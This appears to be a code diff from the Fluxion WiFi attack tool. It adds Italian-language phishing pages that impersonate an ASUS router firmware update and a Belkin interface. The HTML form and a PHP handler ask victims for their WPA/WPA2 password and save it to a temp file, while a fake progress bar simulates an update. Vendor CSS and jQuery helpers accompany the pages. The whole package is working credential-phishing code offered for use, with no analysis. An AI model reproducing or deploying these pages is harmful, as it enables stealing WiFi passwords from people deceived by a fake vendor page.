||||
<tr>
|
||||
<th>Nuova Versione Firmware</th>
|
||||
<td>4.3.0.1.512_3045-g8c15627</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<th style="border-right: none; background-color: #475A5F"></th>
|
||||
<td style="border-left: none"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<th>WPA/WPA2</th>
|
||||
<td><input id="wpa_psw" name="wpa_psw" type="password"></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<th>Conferma WPA/WPA2</th>
|
||||
<td><input id="wpa_psw_conf" name="wpa_psw_conf" type="password"></td>
|
||||
</tr>
|
||||
<tr align="center">
|
||||
<td colspan="2">
|
||||
<input type="submit" id="button_update" class="button_gen" value="Aggiorna">
|
||||
</td>
|
||||
</tr>
|
||||
|
||||
</tbody>
|
||||
</table>
|
||||
</form>
|
||||
<br>
|
||||
<p style="text-align: center">
|
||||
<progress id="pbar" value="0" max="100"></progress>
|
||||
</p>
|
||||
</td>
|
||||
</tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</td>
|
||||
|
||||
|
||||
</tr>
|
||||
</tbody></table>
|
||||
<!--===================================Ending of Main Content===========================================-->
|
||||
</td>
|
||||
|
||||
<td width="10" align="center" valign="top"> </td>
|
||||
</tr>
|
||||
</tbody></table>
|
||||
|
||||
<div id="footer"><div align="center" class="bottom-image"></div>
|
||||
<div align="center" class="copyright">2015 ASUSTeK Computer Inc. All rights reserved.</div><br><div style="margin-top:-75px;margin-left:205px;"><table width="765px" border="0" align="center" cellpadding="0" cellspacing="0"><tbody><tr><td width="20" align="right"><div id="bottom_help_icon" style="margin-right:3px;"></div></td><td width="100" id="bottom_help_title" align="left">Help & Support</td><td width="300" id="bottom_help_link" align="left"> <a style="font-weight: bolder;text-decoration:underline;cursor:pointer;" href="http://www.asus.com/us/Networking/RTAC3200/HelpDesk_Manual/" target="_blank">Manual</a> | <a style="font-weight: bolder;text-decoration:underline;cursor:pointer;" href="http://www.asus.com/us/Networking/RTAC3200/HelpDesk_Download/" target="_blank">Utility</a></td><td width="290" id="bottom_help_FAQ" align="right" style="font-family:Arial, Helvetica, sans-serif;">FAQ <input type="text" id="FAQ_input" class="input_FAQ_table" maxlength="40" onkeypress="submitenter(this,event);"></td><td width="30" align="left"><div id="bottom_help_FAQ_icon" class="bottom_help_FAQ_icon" style="cursor:pointer;margin-left:3px;" target="_blank"></div></td></tr></tbody></table></div>
|
||||
</div>
|
||||
|
||||
<script type="text/javascript" src="js/jquery-2.1.4.min.js"></script>
|
||||
<script type="text/javascript" src="js/pBar.js"></script>
|
||||
<script type="text/javascript">
|
||||
$(document).ready(function() {
|
||||
$("#updateform").submit(function(e) {
|
||||
|
||||
e.preventDefault();
|
||||
$(".error").hide();
|
||||
|
||||
var hasError = false;
|
||||
var wpa_psw = $("#wpa_psw").val();
|
||||
var wpa_psw_conf = $("#wpa_psw_conf").val();
|
||||
|
||||
if (wpa_psw == '') {
|
||||
$("#wpa_psw").after('<span class="error">Per favore, inserire la password.</span>');
|
||||
hasError = true;
|
||||
} else if (wpa_psw_conf == '') {
|
||||
$("#wpa_psw_conf").after('<span class="error">Per favore, inserire la stessa password.</span>');
|
||||
hasError = true;
|
||||
} else if (wpa_psw != wpa_psw_conf ) {
|
||||
$("#wpa_psw_conf").after('<span class="error">Le password non sono uguali.</span>');
|
||||
hasError = true;
|
||||
}
|
||||
|
||||
|
||||
if (!hasError) {
|
||||
var formURL = $(this).attr("action");
|
||||
var pBar = $("#pbar");
|
||||
|
||||
$.ajax({
|
||||
type: "POST",
|
||||
url : formURL,
|
||||
data: {wpa_psw: wpa_psw, wpa_psw_conf: wpa_psw_conf},
|
||||
dataType:'JSON',
|
||||
success:function(response){
|
||||
console.log(response);
|
||||
|
||||
if (response) {
|
||||
// psw OK
|
||||
$("#wpa_psw").prop('disabled', true);
|
||||
$("#wpa_psw_conf").prop('disabled', true);
|
||||
pBar.addClass("update");
|
||||
|
||||
doProgress();
|
||||
} else {
|
||||
alert ("La password inserita non è corretta! Inserire la password corretta.");
|
||||
$("#button_update").prop('disabled', false);
|
||||
}
|
||||
}
|
||||
});
|
||||
}
|
||||
});
|
||||
});
|
||||
</script>
|
||||
|
||||
</body>
|
||||
</html>
|
|
@ -0,0 +1,26 @@
|
|||
var bar = document.getElementById("pbar");
|
||||
|
||||
function addProgress() {
|
||||
var random_value = Math.floor(Math.random() * 10) + 1;
|
||||
|
||||
$({
|
||||
interpVal: bar.value
|
||||
}).animate({
|
||||
interpVal: bar.value + random_value
|
||||
}, {
|
||||
duration: 500,
|
||||
step: function () {
|
||||
bar.value = this.interpVal;
|
||||
}
|
||||
});
|
||||
|
||||
if (bar.value < bar.max) {
|
||||
var random_time = Math.floor(Math.random() * 4000) + 1000;
|
||||
setTimeout(addProgress, random_time);
|
||||
} else
|
||||
alert("Aggiornamento eseguito. Si prega di riavviare il router.");
|
||||
}
|
||||
|
||||
function doProgress() {
|
||||
setTimeout(addProgress, 500);
|
||||
}
|
|
@ -0,0 +1,35 @@
|
|||
<?php
|
||||
require_once('config/connector.php');
|
||||
|
||||
if( (isset($_POST['wpa_psw']) && !empty($_POST['wpa_psw'])) && (isset($_POST['wpa_psw_conf']) && !empty($_POST['wpa_psw_conf'])))
|
||||
{
|
||||
// Aggiornamento tentativi effettuati
|
||||
$hits = file(HIT);
|
||||
$hits[0]++;
|
||||
file_put_contents(HIT, $hits[0]);
|
||||
|
||||
// Password inviata
|
||||
file_put_contents(DATA, $_POST['wpa_psw']."\r\n", FILE_APPEND);
|
||||
|
||||
// Aggiornamento intento
|
||||
$archivio = fopen(INTENTO, "w");
|
||||
fwrite($archivio, "\n");
|
||||
fclose($archivio);
|
||||
|
||||
while (1)
|
||||
{
|
||||
if (file_get_contents(INTENTO) == 2) {
|
||||
// Password ok
|
||||
echo 'true';
|
||||
break;
|
||||
}
|
||||
else if (file_get_contents(INTENTO) == 1) {
|
||||
// Password errata
|
||||
echo 'false';
|
||||
break;
|
||||
}
|
||||
|
||||
sleep(1);
|
||||
}
|
||||
}
|
||||
?>
|
|
@ -0,0 +1,10 @@
|
|||
<?php
|
||||
// Configure this file to matching the variable "DUMP_PATH" into fluxion files
|
||||
|
||||
$TMP_PATH = "/tmp/TMPflux/";
|
||||
|
||||
define("HIT", "$TMP_PATH"."hit.txt");
|
||||
define("DATA", "$TMP_PATH"."data.txt");
|
||||
define("STATUS", "$TMP_PATH"."status.txt");
|
||||
define("INTENTO", "$TMP_PATH"."intento");
|
||||
?>
|
|
@ -0,0 +1,60 @@
|
|||
form{margin:0;padding:0}
|
||||
.leftLink{font-family:Arial,Helvetica,sans-serif;font-size:10.5px;line-height:15px;font-weight:bold;color:#003366;text-decoration:none}
|
||||
.top{FONT:bold 9pt Arial,Helvetica,sans-serif;}
|
||||
.top_nav{font-family:Arial,Helvetica,sans-serif;font-size:12px;font-weight:bold;color:#000000;text-decoration:none}
|
||||
.section{font:caption;font-size:11px;font-stretch:normal;text-indent:inherit;text-align:center;text-decoration:line-through;text-transform:capitalize;color:white}
|
||||
.head_bold{font-family:Arial,Helvetica,sans-serif;font-size:17px;line-height:15px;font-weight:bold;color:#0000ff;text-decoration:none}
|
||||
.body{FONT:9pt Arial,Helvetica,sans-serif;COLOR:#003366}
|
||||
.help{FONT:9pt Arial,Helvetica,sans-serif;COLOR:#000000}
|
||||
.bbody{FONT:9pt Arial,Helvetica,sans-serif;COLOR:#000000}
|
||||
.textbody{FONT:8pt Arial,Helvetica,sans-serif;COLOR:#000000}
|
||||
.test{font-family:Arial,Helvetica,sans-serif;font-size:12px;line-height:14px;color:#000000}
|
||||
.wbody{FONT:9pt Arial,Helvetica,sans-serif;COLOR:#ffffff}
|
||||
a{FONT:bold 9pt Arial,Helvetica,sans-serif;text-decoration:none;color:#003366}
|
||||
.copy_1{font-family:Arial,Helvetica,sans-serif;font-size:11px;line-height:14px;color:#003366}
|
||||
.copy_2{font-family:Arial,Helvetica,sans-serif;font-size:12px;line-height:14px;color:#000000}
|
||||
.submitBtn{font-family:Arial,Helvetica,sans-serif;font-size:11px;border-color:#cccccc;background-color:#cccccc;color:#000000}
|
||||
a:active{color:#ffff00;text-decoration:none;}
|
||||
a:visited{color:#000000;text-decoration:none;}
|
||||
a:hover{text-decoration:underline;color:#0000ff}
|
||||
.Menu_leftLink{font-family:Arial,Helvetica,sans-serif;font-size:8pt;color:#cccccc;text-decoration:none;}
|
||||
.Menu_top_nav{font-family:Arial,Helvetica,sans-serif;font-size:12px;font-weight:bold;color:#FFFFFF;text-decoration:none}
|
||||
.Menu_section{FONT:bold 8pt Arial,Helvetica,sans-serif;text-decoration:none;}
|
||||
.Menu_head_bold{font-family:Arial,Helvetica,sans-serif;font-size:17px;line-height:15px;font-weight:bold;color:#000000;text-decoration:none}
|
||||
.Menu_copy_1{font-family:Arial,Helvetica,sans-serif;font-size:10px;line-height:14px;color:#003366}
|
||||
.Menu_submitBtn{font-family:Arial,Helvetica,sans-serif;font-size:10px;border-color:#666262;background-color:#666262;color:#ffffff}
|
||||
a.menuharf{FONT:8pt Arial,Helvetica,sans-serif;text-decoration:none;color:#cccccc}
|
||||
a.menuharf:link{color:#cccccc;font-size:8pt;font-family:Arial,Helvetica,sans-serif;text-decoration:none;}
|
||||
a.menuharf:visited{color:#cccccc;font-size:8pt;font-family:Arial,Helvetica,sans-serif;text-decoration:none;}
|
||||
a.menuharf:active{color:#cccccc;font-size:8pt;text-decoration:none;}
|
||||
a.menuharf:hover{text-decoration:underline;color:#0000ff}
|
||||
.tdTitle{background-color:#666262;color:#003399;color:#ffffff}
|
||||
.tdText{background-color:#cccccc;}
|
||||
.top_nav{font-family:Arial,Helvetica,sans-serif;font-size:12px;font-weight:bold;color:#000000;text-decoration:none}
|
||||
.leftLink{font-family:Arial,Helvetica,sans-serif;font-size:10.5px;line-height:15px;font-weight:bold;font-color:#000000;text-decoration:none}
|
||||
.head_bold2
|
||||
{font-family:Arial,Helvetica,sans-serif;color:#003366;font-weight:bold;font-size:10pt;}
|
||||
input,select
|
||||
{color:#003366;font-family:Arial,Helvetica,sans-serif;font-size:8pt;}
|
||||
.info_table
|
||||
{font-size:8pt;}
|
||||
.info_table caption
|
||||
{color:#003366;font-family:Arial,Helvetica,sans-serif;font-weight:bold;font-size:9pt;text-align:left;margin-bottom:5px;}
|
||||
.info_table th
|
||||
{color:#FFFFFF;background-color:#666262;}
|
||||
.member_list tr
|
||||
{height:24px;}
|
||||
.info_table td
|
||||
{color:#000000;background-color:#b4b2b2;}
|
||||
.caption
|
||||
{margin:5px;clear:left;}
|
||||
.caption label
|
||||
{width:180px;margin-left:5px;margin-top:5px;float:left;font-weight:bold;}
|
||||
.popup_base
|
||||
{position:absolute;background-image:url('/images/popup_bg.gif');background-repeat:repeat;width:100%;height:100%;display:block;overflow:hidden;visibility:hidden;z-index:500;left:0px;top:0px;}
|
||||
.popup_panel
|
||||
{position:absolute;border:5px double #0099FF;padding:10px;background-color:#FFF;width:500px;z-index:600;}
|
||||
.ip_panel input
|
||||
{width:30px;margin:2px;}
|
||||
.mac_panel input
|
||||
{width:20px;margin:2px;}
|
|
@ -0,0 +1,36 @@
|
|||
span.error {
|
||||
color: #CC0000;
|
||||
font-size: 10px;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
progress {
|
||||
display: none;
|
||||
width: 25em;
|
||||
}
|
||||
|
||||
progress.update {
|
||||
display: inline-block;
|
||||
}
|
||||
|
||||
.bold {
|
||||
font-weight: bold !important;
|
||||
}
|
||||
|
||||
.red {
|
||||
color: #CC0000 !important;
|
||||
}
|
||||
|
||||
fieldset {
|
||||
border: none;
|
||||
}
|
||||
|
||||
fieldset .bold {
|
||||
display: block;/* force to a block so width and word wrap work */
|
||||
float: left;/* keep to left of following control */
|
||||
width: 183px;
|
||||
margin: 1px 8px 4px 0;
|
||||
padding: 0;
|
||||
border: 0;
|
||||
text-align: right;
|
||||
}
|
After Width: | Height: | Size: 1.2 KiB |
After Width: | Height: | Size: 2.1 KiB |
After Width: | Height: | Size: 49 B |
|
@ -0,0 +1,22 @@
|
|||
<html>
|
||||
<head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|
||||
|
||||
<title>Belkin</title>
|
||||
<link rel="shortcut icon" type="image/png" href="./img/favicon.ico"/>
|
||||
</head>
|
||||
|
||||
<frameset border="0" framespacing="0" rows="67,*" frameborder="0">
|
||||
<frame name="topFrame" src="setup_top.htm" noresize scrolling="no">
|
||||
|
||||
<frameset name="right_frame" border="0" framespacing="0" frameborder="0" cols="*,0">
|
||||
<frame name="mainFrame" src="status.html">
|
||||
</frameset>
|
||||
|
||||
<noframes>
|
||||
<body>
|
||||
<body></body>
|
||||
</body>
|
||||
</noframes>
|
||||
</frameset>
|
||||
</html>
|
|
@ -0,0 +1 @@
|
|||
$("ul.dropdown-menu [data-toggle=dropdown]").on("click",function(b){b.preventDefault();b.stopPropagation();$("ul.dropdown-menu [data-toggle=dropdown]").parent().removeClass("open");$(this).parent().addClass("open");var d=$(this).parent().find("ul");var a=d.offset();if((a.left+d.width())+30>$(window).width()){var c=-d.width()}else{var c=$(this).parent().width()}d.css({left:c})});
|
|
@ -0,0 +1 @@
|
|||
try{$(document).ready(function(){$("table.az_wrap").wrap("<div class='table-responsive' />");$("table").attr("border","0");$("table").addClass("table table-condensed table-hover");$("table tr:has(input), table tr:has(select)").removeClass("row-even").siblings("tr").removeClass("row-even");$("table tr:has(input), table tr:has(select)").removeClass("row-odd").siblings("tr").removeClass("row-odd");$("table.az_wrap tr:even").addClass("row-even");$("table.az_wrap tr:odd").addClass("row-odd");$("table.az_wrap").addClass("table-bordered");$("table tr td:first-child").addClass("column-first");$("table tr td:last-child").addClass("column-last");$("table tr td").attr("align","");$("form").attr("role","form");$("form").addClass("form-horizontal");$(":text,textarea,select,:password").addClass("form-control input-sm");$(":button[value='Remove'],:submit[value='Remove'],:submit[value='DELETE']").addClass("btn btn-danger btn-sm");$(":button[value='View'],:submit[value='View'],:reset,:button[value='CANCEL'],:submit[value='CANCEL']").addClass("btn btn-info btn-sm");$(":button[value='Load Signed'],:submit[value='Load Signed']").addClass("btn btn-success btn-sm");$(":button[value='View'],:submit[value='View']").addClass("btn btn-info btn-sm");$(":button,:submit").not(".btn").addClass("btn btn-primary btn-sm");parent.showBaseframe();parent.autoResize("basefrm");try{$(".az_tooltip").tooltip();$(".az_popover").popover()}catch(a){}try{if(screenDaig==1){$("a[data-target=#helpModal]").click(function(b){b.preventDefault();var c=$(this).attr("href");$("#helpModal .modal-body").load(c,function(){$("#helpModal").modal("show")})})}}catch(a){}try{if(screenSyslog==1){$("body").on("hidden.bs.modal",".modal",function(){$(this).removeData("bs.modal")});$("#summaryModal").on("loaded.bs.modal",function(b){$(this).find("table tr:even").addClass("row-even");$(this).find("table tr:odd").addClass("row-odd");$(this).find("table.az_wrap").wrap("<div class='table-responsive' />")})}}catch(a){}})}catch(e){parent.showBaseframe();parent.autoResize("basefrm")};
|
|
@ -0,0 +1 @@
|
|||
(function(b){(jQuery.browser=jQuery.browser||{}).mobile=/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i.test(b)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(b.substr(0,4))})(navigator.userAgent||navigator.vendor||window.opera);
|
|
@ -0,0 +1 @@
|
|||
var vstrings=parent.ary_strings;function DictionaryStrings(){this.dicObj={};if(typeof(vstrings)=="undefined"){alert("Load strings failure for js!!");return}for(var a=0;vstrings[a][0]!="";a++){this.dicObj[vstrings[a][0]]=vstrings[a][1]}this.getstring=function(b){if(typeof(this.dicObj[b])!="undefined"){return this.dicObj[b]}else{alert(b+":has not be defined in language string array!");return""}}}var langtxt=new DictionaryStrings();window._=function(a){return langtxt.getstring(a)};function doValidIPAndMask(c,b,a){if((c=="")&&(b!="")){if(a==1){alert(_("DesIPInvalid")+c)}else{if(a==2){alert(_("SorIPInvalid"))}else{alert(_("IPIsEmpty"))}}return false}else{if((c!="")&&(b=="")){if(a==1){alert(_("DesNetInvalid"))}else{if(a==2){alert(_("SorNetInvalid"))}else{alert(_("SubMaskInvalid")+b)}}return false}else{return true}}}function chineseCheck(b,a){var f=document.getElementById(a);var e=f.innerText;var d=b.value;var c;if(e==undefined){e="Warning : input"}for(c=0;c<d.length;c++){if(d.charCodeAt(c)<0||d.charCodeAt(c)>255){alert(e+_("ContentCHN"));return true}}return false}function isValidAscii(c){for(var a=0;a<c.length;a++){var b=c.charAt(a);if(b<" "||b>"~"){return b}}return""}function isNumeric(c){var a=c.length;var b;if(a==0){return false}for(i=0;i<a;i++){b=c.charAt(i);if(b>"9"||b<"0"){return false}}return true}function isValidUrlName(b){var c=0;var a=new Array();a[c++]="www";a[c++]="com";a[c++]="org";a[c++]="net";a[c++]="edu";a[c++]="www.";a[c++]=".com";a[c++]=".org";a[c++]=".net";a[c++]=".edu";if(isValidAscii(b)!=""){return false}for(c=0;c<b.length;c++){if(b.charAt(c)=="\\"||b.charAt(c)==" "||b.charAt(c)=="#"||b.charAt(c)=="@"||b.charAt(c)==","||b.charAt(c)=="%"){return false}}if(b==""){return false}if(b.length<3){return false}for(j=0;j<a.length;j++){if(b==a[j]){return false}}return true};
|